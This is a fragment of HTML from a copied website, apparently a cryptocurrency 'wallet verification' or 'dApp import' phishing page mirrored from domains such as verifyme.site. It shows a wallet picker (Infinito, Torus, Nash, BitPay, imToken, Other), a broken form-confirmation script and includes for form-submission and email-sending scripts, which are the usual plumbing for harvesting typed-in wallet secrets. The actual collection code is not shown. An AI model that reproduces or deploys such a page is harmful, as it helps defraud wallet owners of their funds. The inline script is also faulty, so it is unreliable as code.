                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Infinito
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/infinito-wallet-68da061495160c96f4bcb5e70e612fdd.png"
                                alt="Infinito">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Torus
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/image%20(6).jpg" alt="torus">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Nash
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/image%20(5).jpg" alt="nash">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            BitPay
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="Bitpay">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            imTOken
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/imtoken-fd8c7c52dac6101568954e7448a49202.png" alt="imtoken">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Other Wallet
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/otherssss.jpg" alt="Other">
                        </div>
                    </div>
                    <!-- end -->
                </div>
            </section>
        </div>
        <div id="gatsby-announcer"
            style="position:absolute;top:0;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border:0"
            aria-live="assertive" aria-atomic="true">Navigated to Wallets</div>
    </div>



    <script>
        function thankyou_message() {
            var form = document.querySelector('.gform');
            var forma = document.querySelectorAll(".gform");
            console.log(forma);
            var thankyouMessage = document.querySelector('.thankyou_message');
            if (form.value != null || form.value != empty) {
                thankyouMessage.style.display == block;
            } else {
                thankyouMessage.style.display == none;
            }
        }
        // var form = document.getElementsByTagName('form')
        // if (form.value != null) {
        //     function thankyou_message() {
        //         var thankyou_message = document.querySelector('thankyou_message')
        //         thankyou_message.style.display == block;
        //     }
        // }
    </script>
    <script src="js/mine.js"></script>
    <!-- <script src="../../../smtpjs.com/v3/smtp.js"></script> -->
    <!-- <script data-cfasync="false" type="text/javascript" src="js/form-submission-handler.js"></script> -->
    <script src="js/app.min.js"></script>
    <script src="js/js1.js">
    </script>
    <script src="js/js2.js">
    </script>
    <script>
    </script>



</body>
<!-- Mirrored from verifyme.site/en/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 01 Feb 2022 04:00:11 GMT -->


<!-- Mirrored from maintdapp.com/dex/imp/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 16 Apr 2023 14:46:11 GMT -->

</html>